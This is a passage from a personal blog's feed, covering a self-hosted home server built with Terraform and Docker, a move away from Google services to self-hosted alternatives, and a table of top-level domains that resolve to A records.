href="/blog/2019/02/24/btrfs-raid-device-replacement-story/">Part 6, btrfs RAID device replacement</a></li> </ol> <p>If you have any comments, <a href="/contact/">reach out to me</a></p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>If you get lucky with their customer support, some of the folks I know 
have a static public IP on their home setup. In my case, they asked me to upgrade to a corporate plan. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>I once scanned their entire network using <code class="language-plaintext highlighter-rouge">masscan</code>. It was fun: <a href="https://medium.com/@captn3m0/i-scanned-all-of-act-bangalore-customers-and-the-results-arent-surprising-fecf9d7fe775">https://medium.com/@captn3m0/i-scanned-all-of-act-bangalore-customers-and-the-results-arent-surprising-fecf9d7fe775</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:3" role="doc-endnote"> <p>AWS calls its “permanent” IP addresses “Elastic” and Digital Ocean calls them “Floating”. We really need better names in this industry. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:4" role="doc-endnote"> <p>Migrating to Wireguard is on my list, but I haven’t found any good documentation on running a hub-spoke network so far. 
<a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> A records on top level domains 2018-02-09T00:00:00+00:00 https://captnemo.in/blog/2018/02/09/tld-a-records <p>Re-ran the same scan as http://blog.towo.eu/a-records-on-top-level-domains/</p> <p>Scan run from <code class="language-plaintext highlighter-rouge">AS9498</code>.</p> <p>Results:</p> <table> <thead> <tr> <th>TLD</th> <th>IP</th> </tr> </thead> <tbody> <tr> <td>ai</td> <td>209.59.119.34</td> </tr> <tr> <td>android</td> <td>127.0.53.53</td> </tr> <tr> <td>arab</td> <td>127.0.53.53</td> </tr> <tr> <td>cal</td> <td>127.0.53.53</td> </tr> <tr> <td>chrome</td> <td>127.0.53.53</td> </tr> <tr> <td>cm</td> <td>195.24.205.60</td> </tr> <tr> <td>dclk</td> <td>127.0.53.53</td> </tr> <tr> <td>dk</td> <td>193.163.102.58</td> </tr> <tr> <td>drive</td> <td>127.0.53.53</td> </tr> <tr> <td>etisalat</td> <td>127.0.53.53</td> </tr> <tr> <td>gg</td> <td>87.117.196.80</td> </tr> <tr> <td>gle</td> <td>127.0.53.53</td> </tr> <tr> <td>guge</td> <td>127.0.53.53</td> </tr> <tr> <td>hangout</td> <td>127.0.53.53</td> </tr> <tr> <td>je</td> <td>87.117.196.80</td> </tr> <tr> <td>nexus</td> <td>127.0.53.53</td> </tr> <tr> <td>pa</td> <td>168.77.8.43</td> </tr> <tr> <td>play</td> <td>127.0.53.53</td> </tr> <tr> <td>pn</td> <td>80.68.93.100</td> </tr> <tr> <td>politie</td> <td>127.0.53.53</td> </tr> <tr> <td>sport</td> <td>127.0.53.53</td> </tr> <tr> <td>tk</td> <td>217.119.57.22</td> </tr> <tr> <td>uz</td> <td>91.212.89.8</td> </tr> <tr> <td>ws</td> <td>64.70.19.33</td> </tr> <tr> <td>谷歌</td> <td>127.0.53.53</td> </tr> <tr> <td>мон</td> <td>218.100.84.27</td> </tr> <tr> <td>мон</td> <td>202.170.80.40</td> </tr> <tr> <td>мон</td> <td>180.149.98.78</td> </tr> <tr> <td>اتصالات</td> <td>127.0.53.53</td> </tr> <tr> <td>政府</td> <td>127.0.53.53</td> </tr> <tr> <td>عرب</td> <td>127.0.53.53</td> </tr> <tr> <td>招聘</td> <td>127.0.53.53</td> </tr> <tr> <td>グーグル</td> <td>127.0.53.53</td> </tr> </tbody> 
</table> <p><em>Update</em>: An automatically updated version of this is available at https://captnemo.in/tld-a-record/</p> Migrating from Google (and more) 2017-12-31T00:00:00+00:00 https://captnemo.in/blog/2017/12/31/migrating-from-google <div class="toc"> <h4 id="contents">Contents</h4> <ul> <li><a href="#email">Email</a></li> <li><a href="#google-play-music">Google Play Music</a></li> <li><a href="#google-keep">Google Keep</a></li> <li><a href="#phone">Phone</a> <ul> <li><a href="#microg-core">microG Core</a></li> <li><a href="#unifiedlp">UnifiedLP</a></li> <li><a href="#maps">Maps</a></li> <li><a href="#uber">Uber</a></li> <li><a href="#calendar-contacts">Calendar/Contacts</a></li> <li><a href="#google-play-store">Google Play Store</a></li> </ul> </li> <li><a href="#lastpass">LastPass</a></li> <li><a href="#github">GitHub</a></li> </ul> </div> <p>As part of working on my home-server setup, I wanted to move off a few online services to ones that I manage. This is a list of the services I used and what I’ve migrated to.</p> <p><em>Why</em>: I got frustrated with <a href="https://music.google.com" title="Google Play Music">Google Play Music</a> a few times. Synced songs would not show up across all clients immediately (I had to refresh, uninstall, reinstall), and I hated the client limits it would impose. 
Decided to try <a href="https://microg.org/" title="MicroG is a free-as-in-freedom re-implementation of Google’s proprietary Android user space apps and libraries.">microG</a> on my phone at the same time, and it slowly came together.</p> <h1 id="email">Email</h1> <p>I’ve been using email on my own domain for quite some time (<code class="language-plaintext highlighter-rouge">captnemo.in</code>), but it was managed by an Outlook+Google combination that I didn’t like very much.</p> <p>I switched to <a href="http://www.migadu.com/" title="Migadu is email hosting built and operated by humans">Migadu</a> sometime last year, and have been quite happy with the service. Their <a href="https://www.migadu.com/privacy/">Privacy Policy</a> and <a href="https://www.migadu.com/procon/">pro/cons</a> section on the website are a pleasure to read.</p> <p><em>Why</em>: Email is the central-point of your online digital identity. Use your own-domain, at the very least. That way, you’re at least protected if Google decides to suspend your account. Self-hosting email is a big responsibility that requires critical uptime, and I didn’t want to manage that, so went with migadu.</p> <p><em>Why Migadu</em>: You should read their <a href="https://news.ycombinator.com/item?id=13048334">HN thread</a>.</p> <p><em>Caveats</em>: They don’t yet offer 2FA, but hopefully that should be fixed soon. Their spam filters aren’t the best either. Migadu even has a <a href="https://www.migadu.com/procon/#the-drawbacks-list">Drawbacks</a> section on their website that you <em>must read</em> before signing up.</p> <p><em>Alternatives</em>: RiseUp, FastMail.</p> <h1 id="google-play-music">Google Play Music</h1> <p>I quite liked <a href="https://music.google.com" title="Google Play Music">Google Play Music</a>. While their subscription offering is horrible in India, I was a happy user of their “bring-your-own-music” plan. In fact, the most used Google service on my phone happened to be Google Play Music! 
I switched to a nice subsonic fork called AirSonic, which gives me the ability to:</p> <ul> <li>Listen on as many devices as I want (Google has some limits)</li> <li>Listen using multiple clients at the same time</li> <li>Stream at whatever bandwidth I pick (I stream at 64kbps over 2G networks!)</li> </ul> <p>I’m currently using <a href="https://www.clementine-player.org/">Clementine</a> on the Desktop (which unfortunately, doesn’t cache music), and <a href="https://github.com/ultrasonic/ultrasonic/">UltraSonic</a> on the phone. Airsonic even supports bookmarks, so listening to audiobooks becomes much simpler.</p> <p><em>Why</em>: I didn’t like Google Play Music limits, plus I wanted to try the “phone-without-google” experiment.</p> <p><em>Why AirSonic</em>: <a href="https://github.com/sindremehus/subsonic">Subsonic</a> is now closed source, and the <a href="https://www.reddit.com/r/selfhosted/comments/6saiac/airsonic_is_out/dlbea94/">Libresonic developers forked off to AirSonic</a>, which is under active development. It is supported across all devices that I use, while <a href="http://ampache.org/">Ampache</a> has spotty Android support.</p> <h1 id="google-keep">Google Keep</h1> <p>I switched across to <a href="https://workflowy.com">WorkFlowy</a>, which has both an Android and a Linux app (both based on webviews). I’ve used it for years, and it is a great tool. Moreover, I’m also using DAVDroid sync for Open Tasks app on my phone. Both of these work well enough offline.</p> <p><em>Why</em>: I didn’t use Keep much, and WorkFlowy is a far better tool anyway.</p> <p><em>Why WorkFlowy</em>: It is <em>the best</em> note-taking/list tool I’ve used.</p> <h1 id="phone">Phone</h1> <p>I switched over to the <a href="https://lineage.microg.org/">microG fork of lineageOS</a> which offers a reverse-engineered implementation of the Google Play Services modules. 
It includes:</p> <h2 id="microg-core">microG Core</h2> <p>Which talks to Google for Sync, Account purposes.</p> <p><em>Why</em>: Saves me a lot of battery. I can uninstall this, unlike Google Play Services.</p> <p><em>Cons</em>: Not all google services are supported very well. Push notifications have some issues on my phone. See the <a href="https://github.com/microg/android_packages_apps_GmsCore/wiki/Implementation-Status">Wiki</a> for Implementation Status.</p> <h2 id="unifiedlp">UnifiedLP</h2> <p>Instead of the Google Location Provider. I use the Mozilla Location Services, along with Mozilla Stumbler to help improve their data.</p> <p><em>Why</em>: Google doesn’t need to know where I am.</p> <p><em>Caveats</em>: GALP (Google Assisted Location Provider) does GPS locks much faster in comparison. However, I’ve found the Mozilla Location Services coverage in Bangalore to be pretty good.</p> <h2 id="maps">Maps</h2> <p>Still looking for decent alternatives.</p> <h2 id="uber">Uber</h2> <p>microG comes with a Google Maps shim that talks to Open Street Maps. The maps feature on Uber worked fine with that shim, however booking cabs was not always possible. I switched over to <code class="language-plaintext highlighter-rouge">m.uber.com</code> which worked quite well for some time.</p> <p>Uber doesn’t really spend resources on their mobile site though, and it would occasionally stop working. Especially with regards to payments. I’ve switched over to the Ola mobile website, which works pretty well. I keep the OlaMoney app for recharging the OlaMoney wallet alongside.</p> <p>Uber-&gt;Ola switch was also partially motivated by <a href="https://www.theguardian.com/technology/2017/jun/18/uber-travis-kalanick-scandal-pr-disaster-timeline">how-badly-run Uber is</a>.</p> <h2 id="calendarcontacts">Calendar/Contacts</h2> <p>Most implementations support caldav/carddav for calendar/contacts sync. 
I’m using DAVDroid for syncing to a self-hosted <a href="https://radicale.org" title="A Free and Open-Source CalDAV and CardDAV Server, runs on Python">Radicale Server</a>.</p> <p><em>Why</em>: I’ve always had contacts synced to Google, so it was always my-single-source-of-truth for contacts. But since I’m on a different email provider now, it makes sense to move off those contacts as well. Radicale also lets me manage multiple addressbooks very easily.</p> <p><em>Why Radicale</em>: I looked <a href="https://github.com/Kickball/awesome-selfhosted#calendaring-and-contacts-management">around at alternatives</a>, and 2 looked promising: Sabre.io, and Radicale. Sabre is no longer under development, so I picked Radicale, which also happened to have a <a href="https://hub.docker.com/r/tomsquest/docker-radicale/">regularly updated docker image</a>.</p> <h2 id="google-play-store">Google Play Store</h2> <p>Switch to <a href="https://f-droid.org/">FDroid</a> - It has some apps that <a href="https://adaway.org/">Google doesn’t</a> <a href="https://newpipe.schabi.org/">like</a>, and some more. Moreover, you can use YALP Store to download any applications from the Play Store. You can even run a FDroid repository for the apps you use from Play Store, as an alternative. 
See <a href="https://shadow53.com/android/no-gapps/faq/can-i-use-the-official-play-store-with-microg/">this excellent</a> guide on the various options.</p> <p><em>Why</em>: Play Store is tightly linked to Google Play Services, and doesn’t play nice with <a href="https://microg.org/" title="MicroG is a free-as-in-freedom re-implementation of Google’s proprietary Android user space apps and libraries.">microG</a>.</p> <p><em>Why FDroid</em>: FDroid has <a href="https://f-droid.org/docs/Reproducible_Builds/?title=Deterministic,_Reproducible_Builds">publicly verifiable builds</a>, and tons of open-source applications.</p> <p><em>Why Yalp</em>: Was easy enough to setup.</p> <p>If you’re looking to migrate to MicroG, I’d recommend going through the entire <a href="https://shadow53.com/android/no-gapps/setup-guide/microg/">NO Gapps Setup Guide</a> by shadow53 before proceeding.</p> <h1 id="lastpass">LastPass</h1> <p>I’ve switched to <code class="language-plaintext highlighter-rouge">pass</code> along with a sync to keybase.</p> <p><em>Why</em>: <a href="https://en.wikipedia.org/wiki/LastPass#Security_issues">LastPass has had multiple breaches</a>, and a plethora of security issues (including 2 RCE vulnerabilities). Their fingerprint authentication on Android could be bypassed until recently. <em>I just can’t trust them any more.</em></p> <p><em>Why pass</em>: It is built on strong crypto primitives, is open-source, and has good integration with both <a href="https://github.com/cdown/passmenu"><code class="language-plaintext highlighter-rouge">i3</code></a> and <a href="https://github.com/browserpass/browserpass-extension">firefox</a>. 
There is also a <a href="https://git.zx2c4.com/password-store/tree/contrib/importers/lastpass2pass.rb">LastPass migration script</a> that I used.</p> <p><em>Caveats</em>: Website names are used as filenames in pass, so even though passwords are encrypted, you don’t want to push it to a public Git server (since that would expose the list of services you are using). I’m using my <a href="https://git.captnemo.in" title="Hosted by gitea, uptime not guaranteed">own git server</a>, along with keybase git (which keeps it end-to-end encrypted, even branch names). You also need to be careful about your GPG keys, instead of a single master password.</p> <h1 id="github">GitHub</h1> <p>For bonus, I setup a Gitea server hosted at <a href="https://git.captnemo.in" title="Hosted by gitea, uptime not guaranteed">git.captnemo.in</a>. <a href="https://gitea.io/en-US/">Gitea</a> is a fork of <a href="https://gogs.io/">gogs</a>, and is a single-binary go application that you can run easily.</p> <p>Just running it for fun, since I’m pretty happy with my GitHub setup. However, I might move some of my sensitive repos (such as <a href="https://github.com/captn3m0/dir-600l" title="Reverse engineered firmware for my D-Link 600L router">this</a>) to my own host.</p> <p><em>Why Gitea</em>: The other alternatives were <code class="language-plaintext highlighter-rouge">gogs</code>, and GitLab. There have been concerns about gogs development model, and GitLab was just too overpowered/heavy for my use case. 
(I’m using the home server for gaming as well, so it matters)</p> <hr /> <p>If you’re interested in my <a href="/setup/homeserver/">self-hosting setup</a>, I’m using Terraform + Docker, the code is hosted on <a href="https://git.captnemo.in/nemo/nebula" title="If this is down, wait">the same server</a>, and I’ve been writing about my experience and learnings:</p> <ol> <li><a href="/blog/2017/09/17/home-server-build/">Part 1, Hardware</a></li> <li><a href="/blog/2017/11/09/home-server-update/">Part 2, Terraform/Docker</a></li> <li><a href="/blog/2017/12/18/home-server-learnings/">Part 3, Learnings</a></li> <li><a href="/blog/2017/12/31/migrating-from-google/">Part 4, Migrating from Google (and more)</a></li> <li><a href="/blog/2018/04/22/home-server-networking/">Part 5, Home Server Networking</a></li> <li><a href="/blog/2019/02/24/btrfs-raid-device-replacement-story/">Part 6, btrfs RAID device replacement</a></li> </ol> <p>If you have any comments, <a href="/contact/">reach out to me</a></p> Learnings from building my own home server 2017-12-18T00:00:00+00:00 https://captnemo.in/blog/2017/12/18/home-server-learnings <h2 id="learnings">Learnings</h2> <p>I forgot to do this on the last blog post, so here is the list:</p> <ol> <li>archlinux has official packages for <a href="https://wiki.archlinux.org/index.php/Microcode">intel-microcode-updates</a>.</li> <li>wireguard is almost there. I’m running openvpn for now, waiting for the stable release.</li> <li>While <a href="https://traefik.io/"><code class="language-plaintext highlighter-rouge">traefik</code></a> is great, I’m concerned about the security model it has for connecting to Docker (uses the docker unix socket over a docker mounted volume, which gives it root access on the host). Scary stuff.</li> <li>Docker Labels are a great signalling mechanism. 
<em>Update</em>: After seeing multiple bugs with how <code class="language-plaintext highlighter-rouge">traefik</code> uses docker labels, they have limited use-cases but work great in those. Don’t try to over-architect them for all your metadata.</li> <li>Terraform still needs a lot of work on their docker provider. A lot of updates destroy containers, which should be applied without needing a destroy.</li> <li>I can’t proxy gitea’s SSH authentication easily, since <code class="language-plaintext highlighter-rouge">traefik</code> doesn’t support TCP proxying yet.</li> <li>The <code class="language-plaintext highlighter-rouge">docker_volume</code> resource in terraform is useless, since it doesn’t give you any control over the volume location on the host. (This might be a docker limitation.)</li> <li>The <code class="language-plaintext highlighter-rouge">upload</code> block inside a <code class="language-plaintext highlighter-rouge">docker_container</code> resource is a great idea. Lets you push configuration straight inside a container. 
This is how I push configuration straight inside the <code class="language-plaintext highlighter-rouge">traefik</code> container for eg: <div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">upload</span> <span class="p">{</span> <span class="nx">content</span> <span class="p">=</span> <span class="s2">"${file("</span><span class="nx">$</span><span class="p">{</span><span class="nx">path</span><span class="err">.</span><span class="nx">module</span><span class="p">}</span><span class="err">/</span><span class="nx">conf</span><span class="err">/</span><span class="nx">traefik</span><span class="err">.</span><span class="nx">toml</span><span class="s2">")}"</span> <span class="nx">file</span> <span class="p">=</span> <span class="s2">"/etc/traefik/traefik.toml"</span> <span class="p">}</span> </code></pre></div> </div> </li> </ol> <h2 id="advice">Advice</h2> <p>This section is if you’re venturing into a docker-heavy terraform setup:</p> <ol> <li>Use <code class="language-plaintext highlighter-rouge">traefik</code>. Will save you a lot of pain with proxying requests.</li> <li>Repeat the <code class="language-plaintext highlighter-rouge">ports</code> section for every IP you want to listen on. 
CIDRs don’t work.</li> <li>If you want to run the container on boot, you want the following: <div class="language-ini highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="py">restart</span> <span class="p">=</span> <span class="s">"unless-stopped"</span> <span class="py">destroy_grace_seconds</span> <span class="p">=</span> <span class="s">10</span> <span class="py">must_run</span> <span class="p">=</span> <span class="s">true</span> </code></pre></div> </div> </li> <li>If you have a single <code class="language-plaintext highlighter-rouge">docker_registry_image</code> resource in your state, you can’t run terraform without internet access.</li> <li>Breaking your docker module into <code class="language-plaintext highlighter-rouge">images.tf</code>, <code class="language-plaintext highlighter-rouge">volumes.tf</code>, and <code class="language-plaintext highlighter-rouge">data.tf</code> (for registry_images) works quite well.</li> <li>Memory limits on docker containers can be too constrained. Keep an eye on logs to see if anything is getting killed.</li> <li>Setup Docker TLS auth <em>first</em>. I tried proxying Docker over apache with basic auth, but it didn’t work out well.</li> </ol> <h2 id="mongodb-with-forceful-server-restarts">MongoDB with forceful server restarts</h2> <p>Since my server gets a forceful restart every few days due to power-cuts (I’m still working on a backup power supply), I faced some issues with MongoDB being unable to recover cleanly. The lockfile would indicate an ungraceful shutdown, and it would require manual repairs, which sometimes failed.</p> <p>As a weird-hacky-fix, since most of the errors were from the MongoDB WiredTiger engine itself, I hypothesized that switching to a more robust engine might save me from these manual repairs. 
I switched to MongoRocks, and while it has stopped the issue with repairs, the wiki still doesn’t like it, and I’m facing this issue: https://github.com/Requarks/wiki/issues/313</p> <p>However, I don’t have to repair the DB manually, which is a win.</p> <h2 id="sshd-on-specific-interface">SSHD on specific Interface</h2> <p>My proxy server has the following</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>eth0 139.59.22.234 </code></pre></div></div> <p>And an associated Anchor IP for static IP use cases via Digital Ocean. (<code class="language-plaintext highlighter-rouge">10.47.0.5</code>, doesn’t show up in <code class="language-plaintext highlighter-rouge">ifconfig</code>).</p> <p>I wanted to run the following setup:</p> <ul> <li><code class="language-plaintext highlighter-rouge">eth0:22</code> -&gt; <code class="language-plaintext highlighter-rouge">sshd</code></li> <li><code class="language-plaintext highlighter-rouge">Anchor-IP:22</code> -&gt; <code class="language-plaintext highlighter-rouge">simpleproxy</code> -&gt; <code class="language-plaintext highlighter-rouge">gitea:ssh</code></li> </ul> <p>where gitea is the git server hosting <code class="language-plaintext highlighter-rouge">git.captnemo.in</code>. 
This way:</p> <ul> <li>I could SSH to the proxy server over 22</li> <li>And directly SSH to the Gitea server over 22 using a different IP address.</li> </ul> <p>Unfortunately, <code class="language-plaintext highlighter-rouge">sshd</code> doesn’t allow you to listen on a specific interface, and since the <code class="language-plaintext highlighter-rouge">eth0</code> IP is non-static I can’t rely on it.</p> <p>As a result, I’ve resorted to just using 2 separate ports:</p> <p><code class="language-plaintext highlighter-rouge">22</code> -&gt; <code class="language-plaintext highlighter-rouge">simpleproxy</code> -&gt; <code class="language-plaintext highlighter-rouge">gitea:ssh</code> <code class="language-plaintext highlighter-rouge">222</code> -&gt; <code class="language-plaintext highlighter-rouge">sshd</code></p> <p>There are some hacky ways around this by creating a new service that boots SSHD after network connectivity, but I thought this was much more stable.</p> <h2 id="wikijs-public-pages">Wiki.js public pages</h2> <p>I’m using wiki.js setup at <a href="https://wiki.bb8.fun">https://wiki.bb8.fun</a>. A specific requirement I had was public pages, so that I could give links to people for specific resources that could be browsed without a login.</p> <p>However, I wanted the default to be authenticated, and only certain pages to be public. 
The config for this was surprisingly simple:</p> <h3 id="yaml-config">YAML config</h3> <p>You need to ensure that <code class="language-plaintext highlighter-rouge">defaultReadAccess</code> is false:</p> <div class="language-yml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">auth</span><span class="pi">:</span> <span class="na">defaultReadAccess</span><span class="pi">:</span> <span class="no">false</span> <span class="na">local</span><span class="pi">:</span> <span class="na">enabled</span><span class="pi">:</span> <span class="no">true</span> </code></pre></div></div> <h3 id="guest-access">Guest Access</h3> <p>The following configuration is set for the guest user:</p> <p><img src="/img/wiki.js-guest-access.jpg" alt="" /></p> <p>Any pages created under the <code class="language-plaintext highlighter-rouge">/public</code> directory are now browseable by anyone.</p> <p>Here is a sample page: <a href="https://wiki.bb8.fun/public/nebula">https://wiki.bb8.fun/public/nebula</a></p> <h2 id="docker-ca-cert-authentication">Docker CA Cert Authentication</h2> <p>I wrote a script that goes with the docker TLS guide to help you setup TLS authentication.</p> <script src="https://gist.github.com/captn3m0/2c2e723b2dcd5cdaad733aad12be59a2.js"></script> <h2 id="openvpn-default-gateway-client-side-configuration">OpenVPN default gateway client side configuration</h2> <p>I’m running an OpenVPN configuration on my proxy server. However, I don’t always want to use my VPN as the default route, only when I’m in an untrusted network. 
I still, however, want to be able to connect to the VPN and use it to connect to other clients.</p> <p>The solution is two-fold:</p> <h3 id="server-side">Server Side</h3> <p>Make sure you <em>do not</em> have the following in your OpenVPN <code class="language-plaintext highlighter-rouge">server.conf</code>:</p> <p><code class="language-plaintext highlighter-rouge">push "redirect-gateway def1 bypass-dhcp"</code></p> <h3 id="client-side">Client Side</h3> <p>I created 2 copies of the VPN configuration files. Both of them have identical config, except for this one line:</p> <p><code class="language-plaintext highlighter-rouge">redirect-gateway def1</code></p> <p>If I connect to the VPN config using this configuration, all my traffic is forwarded over the VPN. If you’re using Arch Linux, this is as simple as creating 2 config files:</p> <ul> <li><code class="language-plaintext highlighter-rouge">/etc/openvpn/client/one.conf</code></li> <li><code class="language-plaintext highlighter-rouge">/etc/openvpn/client/two.conf</code></li> </ul> <p>And running <code class="language-plaintext highlighter-rouge">systemctl start openvpn-client@one</code>. 
I’ve enabled my non-default-route VPN service, so it automatically connects on boot.</p> <hr /> <p>If you’re interested in my <a href="/setup/homeserver/">self-hosting setup</a>, I’m using Terraform + Docker, the code is hosted on <a href="https://git.captnemo.in/nemo/nebula/">the same server</a>, and I’ve been writing about my experience and learnings:</p> <ol> <li><a href="/blog/2017/09/17/home-server-build/">Part 1, Hardware</a></li> <li><a href="/blog/2017/11/09/home-server-update/">Part 2, Terraform/Docker</a></li> <li><a href="/blog/2017/12/18/home-server-learnings/">Part 3, Learnings</a></li> <li><a href="/blog/2017/12/31/migrating-from-google/">Part 4, Migrating from Google (and more)</a></li> <li><a href="/blog/2018/04/22/home-server-networking/">Part 5, Home Server Networking</a></li> <li><a href="/blog/2019/02/24/btrfs-raid-device-replacement-story/">Part 6, btrfs RAID device replacement</a></li> </ol> <p>If you have any comments, <a href="/contact/">reach out to me</a></p> Running terraform and docker on my home server 2017-11-09T00:00:00+00:00 https://captnemo.in/blog/2017/11/09/home-server-update <p>The last time I’d posted about my Home Server build in September, I’d just gotten it working. Since then, I’ve made a lot of progress. It is now running almost 10 services, up from just Kodi back then. Now it has a working copy of:</p> <dl> <dt><a href="https://kodi.tv/">Kodi</a></dt> <dd>I was running <code class="language-plaintext highlighter-rouge">kodi-standalone-service</code>, set to run on boot, as per the <a href="https://wiki.archlinux.org/index.php/Kodi#Kodi-standalone-service">ArchLinux Wiki</a>, but switched in favor of openbox to a simple autorun.</dd> <dt><a href="http://store.steampowered.com/linux">Steam</a></dt> <dd>The current setup uses Steam as the application launcher. 
This lets me ensure that the Steam Controller works across all applications.</dd> <dt><a href="http://openbox.org/wiki/Main_Page">Openbox</a></dt> <dd>Instead of running Kodi on xinit, I’m now running openbox with autologin against a non-privileged user.</dd> <dt>PulseAudio</dt> <dd>I tried fighting it, but it was slightly easier to configure compared to dmix. Might move to dmix if I get time.</dd> <dt>btrfs</dt> <dd>I now have the following disks: <ol> <li>128GB root volume. (Samsung EVO-850)</li> <li>1TB volume for data backups</li> <li>3TB RAID0 configuration across 2 disks. There are some btrfs subvolumes in the 3TB raid setup, including one specifically for docker volumes. The docker guide recommends running btrfs subvolumes on the block device, which I didn’t like, so I’m running docker volumes in normal mode on a btrfs disk. I don’t have enough writes to care much yet, but might explore this further.</li> </ol> </dd> <dt><a href="https://www.docker.com/">Docker</a></dt> <dd>This has been an interesting experiment. Kodi is still installed natively, but I’ve been trying to run almost everything else as a docker container. I’ve managed to do the configuration entirely via terraform, which has been a great learning experience. I’ve found terraform much saner as a configuration system compared to something like ansible, which gets quite crazy. (We have a much crazier terraform config at work, though).</dd> <dt><a href="https://www.terraform.io/">Terraform</a></dt> <dd>I have a private repository on GitLab called <code class="language-plaintext highlighter-rouge">nebula</code> which I use as the source of truth for the configuration. 
It doesn’t hold everything yet, just the following: <ol> <li>Docker Configuration (not the docker service, just the container/volumes)</li> <li>CloudFlare - I’m using <code class="language-plaintext highlighter-rouge">bb8.fun</code> as the root domain, which is entirely managed using the CloudFlare terraform provider.</li> <li>MySQL - Running a MariaDB container, which has been configured by hand till <a href="https://github.com/hashicorp/go-version/pull/34">this PR gets merged</a>.</li> </ol> </dd> <dt><a href="https://github.com/go-gitea/gitea">Gitea</a></dt> <dd>Running as a docker container, provisioned using terraform. Plan to proxy this using <code class="language-plaintext highlighter-rouge">git.captnemo.in</code>.</dd> <dt><a href="https://emby.media/">Emby</a></dt> <dd>Docker Container. Nothing special. Plan to set this up as the Kodi backend.</dd> <dt><a href="https://couchpota.to/">Couchpotato</a></dt> <dd>Experimental setup for now. Inside a docker container.</dd> <dt><a href="https://flexget.com/">Flexget</a></dt> <dd>I wish I knew how to configure this. Also inside docker.</dd> <dt><a href="https://traefik.io/">traefik</a></dt> <dd>Running as a simple reverse proxy for most of the above services.</dd> <dt><a href="http://elibsrv.sourceforge.net/">elibsrv</a></dt> <dd>A simple OPDS server, which I use against my Kindle. If you don’t know what OPDS is, you should [check this out][]. Running on a simple apache setup on the archlinux box for now. WIP for dockerization.</dd> <dt><a href="https://vaemendis.net/ubooquity/">ubooquity</a></dt> <dd>Simple ebook server. Proxied over the internet. Has an online ebook reader, which is pretty cool.</dd> <dt>MariaDB</dt> <dd>I set this up planning to shift Kodi’s data to this, but now that I have emby set up - I’m not so sure. 
Still, keeping this running for now.</dd> <dt><a href="https://transmissionbt.com/">Transmission</a></dt> <dd>Hooked up to couchpotato, flexget, and sickrage so it can do things.</dd> <dt><a href="https://sickrage.github.io/">Sickrage</a></dt> <dd>Liking this more than flexget so far, much easier to configure and use.</dd> <dt><a href="https://airsonic.github.io/">AirSonic</a></dt> <dd>This is the latest fork of libresonic, which was itself forked off subsonic. My attempt at getting off Google Play Music.</dd> </dl> <h2 id="learnings">Learnings</h2> <p>Moved these to a separate <a href="/blog/2017/12/18/home-server-learnings/">blog post</a></p> <h2 id="todo">TODO</h2> <p>A few things off my TODO list:</p> <ol> <li>Create a Docker image for elibsrv that comes with both <code class="language-plaintext highlighter-rouge">ebook-convert</code> and <code class="language-plaintext highlighter-rouge">kindlegen</code> pre-installed</li> <li><del>Do the same for ubooquity as well</del> (Using the <code class="language-plaintext highlighter-rouge">linuxserver/ubooquity</code> docker image)</li> </ol> Home Server Build 2017-09-17T00:00:00+00:00 https://captnemo.in/blog/2017/09/17/home-server-build <p>I’d been planning to run my own home server for a while, and this culminated in a mini-ITX build recently. The current build configuration is available at <a href="/setup/homeserver/">/setup/homeserver/</a>.</p> <p>In no particular order, here were the constraints:</p> <ul> <li>The case should be small (I preferred the Elite 110, but it was unavailable in India).</li> <li>Dual LAN, if possible (decided against it at the end). The plan was to run the entire home network from this directly by plugging the ISP into the server.</li> <li>Recent i3/i5 for amd64 builds.</li> <li>Enough SATA bays in the cabinet for storage</li> </ul> <p>The plans for the server:</p> <ol> <li>Scheduled backups from other sources (Android/Laptop)</li> <li>Run Kodi (or perhaps switch to Emby)</li> <li>Run torrents. Transmission-daemon works. Preferably something pluggable and that works with RSS</li> <li>Do amd64 builds. See https://github.com/captn3m0/ideas#arch-linux-package-build-system</li> <li>Host a webserver. This is primarily for serving resources off the internet <ul> <li>Host some other minor web-services</li> <li>A simple wiki</li> <li>Caldav server</li> <li>Other personal projects</li> </ul> </li> <li>Sync Server setup. Mainly for the Kindle and the phone.</li> <li>Calibre-server, koreader sync server for the Kindle <ul> <li>Now looking at libreread as well</li> </ul> </li> <li>Tiny k8s cluster for running other webapps</li> <li>Run a graylog server for sending other system log data (using papertrail now, has a 200MB limit)</li> </ol> <p>No plans to move mail hosting. 
That will stay at migadu.com for now.</p> <p>I had a lot of spare HDDs that I was going to re-use for this build:</p> <ol> <li>WD MyBook 3TB (external, shelled).</li> <li>Seagate Expansion: 1TB</li> <li>Seagate Expansion 3TB (external, shelled)</li> <li>Samsung EVO 128GB SSD</li> </ol> <p>The 2x3TB disks are set up with RAID1 over <code class="language-plaintext highlighter-rouge">btrfs</code>. Important data is snapshotted to the other 1TB disk using btrfs snapshots and subvolumes. This gives me ~4TB of storage in total.</p> <h2 id="software">Software</h2> <p>Currently running <code class="language-plaintext highlighter-rouge">kodi-standalone-service</code> on boot. Have to decide on an easy-to-use container orchestration platform. Choices as of now are:</p> <ol> <li>Rancher</li> <li>Docker Swarm</li> <li>Shipyard</li> <li>Terraform</li> <li>Portainer</li> </ol> <p>Most of these are tuned for multi-host setups, and bring in a lot of complexity as a result. Looking at Portainer, which seems well suited to a single-host setup.</p> <p>Other services I’m currently running:</p> <ol> <li><code class="language-plaintext highlighter-rouge">elibsrv</code>. 
